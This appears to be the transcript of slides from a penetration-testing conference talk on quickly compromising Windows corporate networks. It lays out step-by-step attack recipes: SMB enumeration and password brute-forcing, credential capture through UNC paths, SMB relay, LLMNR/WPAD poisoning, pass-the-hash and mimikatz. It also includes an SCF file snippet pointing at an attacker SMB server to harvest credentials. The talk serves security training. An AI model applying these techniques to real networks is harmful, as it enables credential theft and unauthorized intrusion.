pwning corporate networks in a single day by paulino calderon pale
TRANSCRIPT
PWNING NETWORKS IN A SINGLE DAY
#CAT /ETC/ABOUT
PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM
THINGS I LEARNED
• 99% OF THE TIME IT WILL BE WINDOWS.• MOST OF THE VULNERABILITIES ARE UNKOWN UNTIL
COMPANIES GET PROFESSIONAL HELP.• NO ONE KNOWS WHAT SOFTWARE IS INSTALLED.• DEFAULT CONFIGURATIONS ARE DANGEROUS.
SMB3.0 3.02
1.02.0
2.1
SMB IS OUR FRIEND
SMB IS THE MOST TARGETED PROTOCOL IN WINDOWS NETWORKS.
WITH SMB:• OBTAIN OS AND ACTIVE DIRECTORY INFORMATION.• STEAL USER NETWORK CREDENTIALS.• ACCESS SHARED FOLDERS.• TEST CREDENTIALS.• EXECUTE COMMANDS OR BINARIES REMOTELY (PSEXEC, WMI,
POWERSHELL…)• A LOF OF VULNERABLE IMPLEMENTATIONS (SERVERS AND CLIENTS)…
DOMAIN CONTROLLERS
• A LOT OF DOMAIN CONTROLLERS ACCEPT NULL SESSIONS.
• THIS INSECURE CONFIGURATION REVEALS INFORMATION ABOUT USERS AND GROUPS.
• WE CAN USE THIS VULNERABILITY TO TARGET HIGH PRIVILEGED USERS.
OBTAINING INFORMATION FROM A DOMAIN CONTROLLER
LINUXENUM 0.9 SAVES USERS IN TEXT FILES DIVIVED BY DOMAIN GROUPS. THE OUTPUT CAN BE USED BY NMAP AND METASPLOIT.DOWNLOAD: HTTPS://GITHUB.COM/CLDRN/ENUM4LINUX-0.9
DOMAIN\USER
OBTAINING INFORMATION FROM DOMAIN CONTROLLERSPOLENUMOBTAINS PASSWORD POLICY FOR A DOMAIN
DOWNLOAD FROM HTTPS://LABS.PORTCULLIS.CO.UK/TOOLS/POLENUM/
“QUICKPWN”
• IDENTIFY DCS• EXECUTE ENUM4LINUX 0.9$ENUM4LINUX –A <IP>• EXECUTE POLENUM TO OBTAIN THE PASSWORD AND
ACCOUNT LOCKOUT POLICIES.POLENUM <IP>• LAUNCH BRUTE FORCE ATTACK TO FIND ACCOUNTS WITH
WEAK PASSWORDSMETASPLOIT: AUXILIARY/SCANNER/SMB/SMB_LOGINNMAP: SMB-BRUTE
SHARED FOLDERS
• ENABLED TO ALLOW PEOPLE TO SHARE FILES OVER THE NETWORK.
• NOT UNCOMMON TO FIND SENSITIVE INFORMATION STORED THERE.
“QUICKPWN”
• FIND SENSITIVE INFORMATION IN SHARED FOLDERS:• FILE LOCATOR LITE O PRO (WWW.MYTHICSOFT.COM)• SMBMAP
STEALING USER CREDENTIALS
• THERE ARE SEVERAL TECHNIQUES THAT CAN BE USED TO ABUSE SHARED FOLDERS TO OBTAIN USER CREDENTIALS.
• NO PATCH (VULNERABLE BY DESIGN).
THE CLASSIC SMB CAPTURE ATTACK
AS EASY AS SETTING UP A SMB SERVER AND WAITING FOR USERS TO SEND US THEIR DOMAIN CREDENTIALS…
DEMO
WHO HAS THE TIME TO WAIT?
UNC PATHS
\\<MACHINE>\<FOLDER>\<FILE>
WHERE CAN WE USE UNC PATHS?
• WEB APPLICATIONS/SHAREPOINT/YOUR OWN WEB SERVER• SQL QUERIES• OFFICE DOCUMENTS• LMHOSTS.SAM <- HOST YOUR OWN MALICIOUS HOSTS FILE• LNK FILES• SCF FILES <- EASIER TO CREATE THAN LNK FILES
“QUICKPWN”
• FIND SHARED FOLDER WITH WRITE PERMISSIONS.• UPLOAD A FILE CONTAING A UNC PATH POINTING TO
YOUR SMB SERVER.• WAIT FOR THE CREDENTIALS…
SCF FILES
[SHELL]COMMAND=2ICONFILE=\\<IP ADDRESS>\SHARE\PWN.ICO[TASKBAR]COMMAND=TOGGLEDESKTOP
DEMO
SMB RELAY ATTACKS
IF SMB SIGNING IS DISABLED, SMB RELAY ATTACKS ARE POSSIBLE.
99.9% SMB SIGNING IS DISABLED ON WINDOWS WORKSTATIONS. (DEFAULT CONFIGURATION)
DEMO
“QUICKPWN”
• FIND A SHARED FOLDER WITH WRITE PERMISSIONS.• UPLOAD A FILE WITH A UNC PATH POINTINT TO YOUR OWN
SMB SERVER.• USE SMBRELAYX.PY TO REDIRECT THE CONNECTION TO
YOUR VICTIM AND GAIN ACCESS TO THE MACHINE WHEN A USER WITH ENOUGH PRIVILEGES CONNECTS…
CAN YOU FORCE USERS TO CONNECT TO US?
• THE PREVIOUS ATTACK TECHNIQUES NEEDED:• USERS CONNECTING TO OUR SMB SERVER• ACCESS TO A SHARED FOLDER WITH WRITE PERMISSIONS
BUT CAN WE USE POISONING ATTACKS TO FORCE USERS TO CONNECT TO US?
THANK YOU WPAD
• ENABLED BY DEFAULT IN ALL WINDOWS VERSIONS.
• DESIGNED TO AUTO CONFIGURE PROXIES IN NETWORKS.
• INTERNET OPTIONS>LAN SETTINGS>AUTOMATICALLY DETECT SETTINGS
LLMNR Y NBT-NS
• ENABLED IN MOST WINDOWS MACHINES.• LLMNR (LINK-LOCAL MULTICAST NAME RESOLUTION)
<-STARTING FROM WINDOWS VISTA• NBT-NS (NETBIOS NAME SERVICE)• ALLOWED IN A LOT OF NETWORKS WITH
RESTRICTIVE ACCESS.
“QUICKPWN”
• DETECT WPAD/LLMNR/NBT-NS REQUESTS ON THE NETWORK
• LAUNCH A SMB SERVER TO CAPTURE USER CREDENTIALS.
• FORCE USERS TO CONNECT TO YOU TROUGH POISONING ATTACKS.
• CAPTURE THE USER CREDENTIALS.
DEMO
DEMO
DEMO
PASS THE HASH
• IT HAS BEEN AROUND FOR ALMOST 20 YEARS NOW.• A LOT OF WINDOWS PROTOCOLS REQUIRE THE HASH OF THE PASSWORD
BUT NOT THE ACTUAL PASSWORD TO AUTHENTICATE.• A LOT OF TOOLS AVAILABLE SUPPORT PTH:
• PTH-WINEXE, MIMIKATZ,• METASPLOIT: PSEXEC_COMMAND, PSEXEC
PTH AGAINST RDP
MICROSOFT INTRODUCED“RESTRICTED ADMIN” MODE, NOW, WE CAN USE PTH AGAINST RDP IN WINDOWS 2012 R2 AND WINDOWS 8.1. (ONLY ADMIN)
MEET PSEXEC
• USEFUL TO LOCATE SYSTEMS THAT SHARE PASSWORDS.
• RUNS COMMANDS OR BINARIES REMOTELY ON MACHINES.
• IT IS VERY NOISY.
DEMO
WDIGEST
• AUTH SYSTEM THAT REQUIRES THAT WINDOWS STORES A PLAINTEXT VERSION OF THE PASSWORDS IN MEMORY.
• WCE, MIMIKATZ FTW
CREDMAP – THE CREDENTIAL MAPPER
DEVELOPED BY ROBERTO SALGADO FROM WEBSEC TO QUICKLY TEST CREDENTIALS AGAINST DIFFERENT SERVICES ONLINE
DOWNLOAD: HTTPS://GITHUB.COM/LIGHTOS/CREDMAP
DEMO
WMI
• PSEXEC ALTERNATIVE• DOES NOT START A SERVICE• DOES NOT TOUCH THE DISK• IN KALI: WMIEXEC Y PTH-WMIS
PENTESTERS LOVE POWERSHELL
POWERSHELL CAN BE USED FROM NETWORK RECONNAISSANCE TO PRIVILEGE ESCALATION.
PROJECTS WORTH MENTIONING:• POWERSPLOIT:
HTTPS://GITHUB.COM/POWERSHELLMAFIA/POWERSPLOIT/• EMPIRE:
HTTP://WWW.POWERSHELLEMPIRE.COM
SMB1 VS SMB2 VS SMB3
• MOST TOOLS ONLY WORK WITH SMB1. (FOR NOW)• SMB2 REMOVES OS FINGERPRINT INFORMATION PRE AUTH.• SMB3 FINALLY INTRODUCES MESSAGE ENCRYPTION.
DEMO
OTHER “QUICKPWNS”
• GOLDEN TICKET KERBEROS• OUTDATED SOFTWARE• SERVICES WITH EXCESSIVE PERMISSIONS• MISCONFIGURED NETWORK PRINTERS• DEVELOPMENT ENVIRONMENTS WITH INSECURE CONFIGURATIONS• INSECURE UPDATE SYSTEMS (*)
DEMO
WHAT OTHER VULNERABILITIES ARE WORTH MENTIONING?
SPAM
OWASP RIVIERA MAYA
NMAP: NETWORK EXPLORATION AND SECURITY AUDITING COOKBOOK 2ND EDITION
WEBSEC OFFICIAL CHANNELS
• WWW: WWW.WEBSEC.MX• YOUTUBE: YOUTUBE.COM/WEBSECMX• FACEBOOK: WEBSEC.MX• TWITTER: @_WEBSEC
CONTACT
PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM